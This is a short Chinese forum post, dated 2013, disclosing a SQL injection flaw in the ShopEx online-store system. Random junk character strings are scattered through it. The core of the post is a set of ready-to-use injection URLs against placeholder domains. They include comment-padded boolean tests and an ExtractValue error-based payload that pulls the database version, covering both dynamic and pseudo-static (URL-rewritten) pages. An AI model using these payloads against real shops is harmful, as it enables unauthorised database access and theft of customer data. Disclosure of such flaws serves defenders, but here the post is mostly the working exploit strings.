注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
1 ]9 S1 T2 q' r& ^6 b9 B2 z* L- C1 Q
好吧,我扯远了~~
$ ?" q% C* c. A3 ^; C- k( \) y其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
+ F- }8 j2 q1 K1 Y; M不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
4 X. a( c2 w1 W0 u! q0 E p" D0 B5 y+ d @
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html C3 R! H3 T$ ]( R/ x5 {6 o
5 E( [: @, G5 ~+ x& bhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 4 h6 X& i7 D4 n' T+ R
" Z/ ], k" v7 Q9 C$ Q
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
+ |! |$ t }# z9 N7 } r
, h b/ l. O1 [) V2 b1 A& jhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html ) c5 I. e0 W6 v
" C" a0 D! e* C& B0 a$ u% |
1 L) [8 j! V- t- ^一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
( P* A# l+ I* l, b如何注入就不多说了,10多年的东西了…不会也会了… 2 l5 E2 R- ]3 R0 j
/ \$ B2 G) z r/ H, g" ^9 G- Z, }3 M S
/ I4 }1 l7 ]' @ K: n9 R, i2 w( f( C# W
: r+ v2 h& z1 s4 e3 l8 }/ M) f
|
发表于 2013-2-19 08:31:27
收藏
支持
反对